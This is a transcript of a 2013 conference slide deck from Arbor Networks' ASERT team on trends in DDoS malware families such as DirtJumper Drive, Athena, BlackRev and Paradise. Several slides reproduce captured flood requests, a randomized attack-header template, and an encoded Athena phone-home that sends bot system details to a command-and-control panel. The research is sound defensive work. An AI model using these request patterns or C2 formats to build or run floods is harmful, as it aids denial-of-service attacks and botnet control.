advancements in ddos malware
DESCRIPTION
This presentation explores advancements in DDoS Malware, based on research from Arbor Networks' ASERT security analyst Jason Jones. This presentation was originally shared at Usenix LEET '13.TRANSCRIPT
Recent Advancements in DDoS Malware Jason Jones
Usenix LEET13
2
Agenda
• Who am I? • Why? • What Hasn’t Changed • What Has Changed
– Better Blending In & Hiding – Better Botnet Building – Better protection
• Trends and Takeaways
3
Who am I?
• Jason Jones – Security Research Analyst on Arbor Networks’ ASERT – Presented at
• BlackHat USA 2012 • InfoSec Southwest 2013
– Research interests • IP reputation • Malware clustering • Data mining • Graph Theory / Combinatorics
4
ASERT Malware Corral
• Arbor Security Engineering & Response Team • ASERT Malware Corral
– Malware storage + processing system – Processing occurs via sandbox, static methods – Tagging via behavioral and static methods
• Currently pulling in upwards of 100k samples / day
• 567 Unique family names tagged last year – Includes DDoS, Bankers, Infostealers, APT, etc.
5
Why?
• DDoS Becoming More of a Threat – SpamHaus – “Triple Crown” – Political Motivations – Anon Ops – Ransom
• DDoS-specific Malware Evolving In Response to Our Response
What Hasn’t Changed
7
Still the same…
• Most Malware Include – Basic GET/POST Flood – SYN and/or Connection Flood – UDP Flood
• Lots of IRC CnC Still Around • Many use hard-coded set of user-agents • Still broken
– Slowloris – ARME
8
Still the same… (cont.)
• .NET malware is still terrible – Most decompiles fine in .NET Reflector – Use .NET HTTP methods – Looks mostly the same for DDoS
• Gh0st RAT variants still popular • Most are not fully protocol aware • Many don’t do SSL / HTTPS • Copy + Paste still prevalent
What Has Changed
10
Better Blending In & Hiding on the Network
• HTTP CnC has always been popular – Tended to be plaintext – Athena recently moved from IRC -> HTTP
• Obfuscates commands • Example:
– a=%5A%47%5A%33%62%57%4E%6F%63%33%42%30%63%6D%56%32%65%47%70%70%59%57%39%78%59%6E%56%73%5A%32%74%75%65%6E%6B%36%5A%58%64%79%64%48%46%75%65%58%42%69%5A%6E%68%76%59%32%74%70%5A%33%5A%71%5A%47%78%36%61%48%56%74%63%32%45%3D
– b=wHR5qGU6d25wZXnzY3c1gWQ6NGFuMWYsMtQ5OTE3ZDu0OTenMTu1MTQ5Yku4OWFzMTekZDY0wHBagXY6YWRbgW58YXJkgDp4ODZ8Z2VlZDpyYXB0d3B8Y29aZXM6MXcoqspXX1nQwHZzqkp2MS4rLkN8dtV0OkQlMHr%3D
– c=%67%6E%75%62%7A%7A%7A%78%68%66%6A%6D%69%65%6C%71%6C%70%70%6D%62%7A%75%6Ex
– Betabot employs encryption on phone-home • Adjustable phone-home intervals
– Specify long intervals to avoid suspicion
11
Better Blending In & Hiding on the Network (cont) • More Intelligent HTTP Attacks
– Requests look more legitimate now • Drive uses randomization in UA’s • Athena uses long list of legitimate UA’s
– More dynamic headers • Paradise borrowed from Armageddon2
– Ability to specify POST parameters • Target search boxes, login forms, etc • Use up DB queries, server processing • Randomized per request, avoid caching
12
Example – DirtJumper Drive POST Attack POST /test HTTP/1.1 Host: 192.168.56.1:10000 User-Agent: Opera/9.80 (Windows NT 6.1; U; Edition Bangladesh Local; ru) Presto/2.10.289 Version/8.06 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Connection: Keep-Alive Referer: http://192.168.56.1:10000/ Content-Length: 2443 Content-Type: application/x-www-form-urlencoded login=q1un7q002imn2843b4qqmk29fsfyk883592qzn4jdgsguc2vy7sqpoi4mlujelbn5levvck21g6j265b48g6f59mocvnzm76en8rin3389c3epk3tgg89i4d796m85gt9hz0wjb4n19w00uh0m9t9xz8857506j08bj2a2r5203897du968e264456ci18b0d3flq2ka4avq9j99e77d31pqcf668654e9xl74u3csa54ygcx45wbg67t47p2p326b00t4r2z99i07z9j2792c10f00l66dt5vnnf90z4xty7kpf1epb1y5l34fwk0939y4c98hs9y856pqc0k03249rfzl640983e35cmw9i607d4zz1k9x3njz2r0v84624566zfoq4afc8c7ku8r31d37ad587cutfn4618476bnp822346s51sms408161jv7m69n2v5i1n4051t99uiru676596nao24j8dcse52a8dzdgcijz0khe0x7elf3w9c1502tjto4332fszyl424g3b911vc1026g79604035lbvk8h31v78b845rqj630ndd42946s18l4832b36ukd2pb917yr60q16e444m36wa9p2us9mj5b7ue4wv5e46m29l4ig8u9lf2wip8ogvv5q8eqj4rkw53k1fo277a3u1m5ca26xrv8fis4337z9p6wbp00u3jc2iq6i6f0rrr4c379x66p0e2z3y57s4kekk370h9w986yd8m5f7l2as0m090v96x42i14qdci43e444h8815jp923545719y2u3b5n450e9c036ws4643zvmp4663j8794w3h5yj71c324n12b3y96pi8487wv6z4xol0rkzq00jtpdgx05gidt8qt7ylyj36y40o2yzwh855x96ftw5qlagzpg2um99u7rap89fca26xrn90015msjbb5417kq037ssje971j8s159g68j0o30agjr2h9zg&......... login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]
13
Example – BlackRev
GET /index.html HTTP/1.1 Host: victim.com Keep-Alive: 266 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Accept-Charset:\twindows-1251,utf-8;q=0.7,*;q=0.3 Referer: http://victim.com/ Cookie:\tPHPSESSID=t0gmf00id9bp4j9gvfsq87kq22; hotlog=1; __utma=226332163.1894789553.1362397126.1362926988.1363866277.4; __utmb=226332163.1.10.1363866277; __utmc=226332163; __utmz=226332163.1362397126.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
14
Athena IRC + HTTP HTTP Attack GET|POST|HEAD /<params> HTTP/1.1!Host: <target>!Range: bytes= <range bytes string>!Connection: Keep-alive | close!
User-Agent: ObtainUserAgentString()!Cache-Control: no-cache | no-store | no-transform | only-if-cached | max-age=0 | public |private | max-stale!
Vary: * | User-Agent!Accept: text/*, text/html, text/html;level=1, */* | */* | text/plain; q=0.5, text/html, text/x-dvi; q=0.8, text/x-c |text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 | image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */* | * | application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5 | text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8!
Accept-Charset: iso-8859-5, unicode-1-1;q=0.8 | * | UTF-8 | ISO-8859-1!Accept-Encoding: * | gzip, deflate | compress;q=0.5, gzip;q=1.0 | gzip;q=1.0, identity; q=0.5, *;q=0 | compress, gzip!
Accept-Language: * | es | de | en-us,en;q=0.5 | en-us, en!Content-Type: application/x-www-form-urlencoded | text/html; charset=ISO-8859-4 | text/html; charset=UTF-8 | application/xhtml+xml; charset=UTF-8 | image/gif!
Content-Length: <length> !X-a: b!
15
Example – Athena HTTP Phone Home POST /gate.php HTTP/1.1 Host: panel-gc.co.uk:69 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727) Content-Length: 436 a=%63%33%70%6e%62%58%52%68%62%6e%56%6f%62%32%4a%70%64%6d%4e%71%63%48%64%6b%63%58%68%72%63%6d%56%73%65%57%59%36%62%48%4e%6a%61%58%42%33%61%6e%46%6b%61%33%68%6c%65%57%5a%74%65%6d%64%30%59%57%35%6f%62%33%5a%69%63%6e%55%3d&c=%31%53%6a%52%31%4a%6e%6c%50%76%6d%73%52%6f%66%56%47%47%48%7a%77%53%51%6b&b=uHR5fGU6fiVgZWF0uHVzZDzgxilnMWdaNGFnx3zmYsbpOGnytXFgx3Q3ZXVdtjN2tXVjfG18fiFpOmM3uGJoX2pzxGnbZDkruGJoX2ZzxGVsOmJ8Yipuw2V5fsk0uGJ1f3h6ZiFlf2V8 • |type:on_exec|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|priv:admin|arch:x86|gend:laptop|cores:1|os:W_XP|
ver:v1.0.3|net:4.0| • |type:repeat|uid:bac6cde8bbd9b242b7fa9f39b1198226f1a5|ram:25|bk_killed:0|bk_files:0|bk_keys:0|busy:false|
16
Example – Paradise status=headers application/xml, image/png, text/html */*, text/html, text/html, application/xml text/x-dvi; q=.8; mxb=100000; mxt=5.0, text/x-c x-gzip, identity x-compress, x-zip, sdch x-compress ,deflate, gzip, x-gzip us-ua;q=0.5 az-us;q=0.9 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) NS8/0.9.6 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322) Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] http://www.snpp.com/ http://ask.fm/FlOoRNOoBlE http://www.thesimpsons.com/ http://mylarha.deviantart.com/ http://www.thesimpsonslatino.com/
17
Building Better Botnets
• Use What’s Readily Available – “Triple Crown” financial attacks
• Tiered CnC Structure • Dynamically update code with new attacks • Can easily adjust attacks if current attack is unsuccessful
– SpamHaus DNS Amplification • Open resolvers • Not botnet per se, but… • Highly successful
18
Better Protections
• Store attacks in external DLL
– Paradise: Pulled down by main EXE – DLL is crypted
• Restrict bots to geo regions – Also blackholing connections
• Drop other malware on the same machine • Previously mentioned obfuscating / encrypting phone-
home • More malware using encryption internal to binary • More packers / obfuscations used
19
Better Protections (cont.)
• More Junk Code • New Drive variant discards old phone home
– 2-stage phone home – Base64 + underlying protection – 3 new attacks – Can now specify hard-coded or random Cookie vals – Still reversing…. – Blog soon?
Trends and Takeaways
20
Trends and Takeaways
• DDoS becoming more of a feature of larger families – Still plenty of standalone, but becoming more common in other malware
• DNS amplification will likely make its way into malware soon – Too successful not to – Too easy not to
• More booter services popping up – Many Athena HTTP CnC hostnames appear to be booter backends
• Carberp source code leak will likely create a boom in carberp variants similar to ZeuS
21
More Trends and Takeways…
• Traditional botnets with DDoS addons don’t DDOS much – DarkComet – Some Athena HTTP used to mostly drop other
malware • Nitol, Betabot, Andromeda, ZeuS • Appear to be botnet-for-hire types
• Still waiting for the first SPDY-aware malware J
• Proper mobile DDoS botnet soon?
22
Questions/Comments/Feedback
• [email protected] • @jasonljones
23
Thanks: Arbor/ASERT, Marc Eisenbarth, Alex Bardas
Thank You!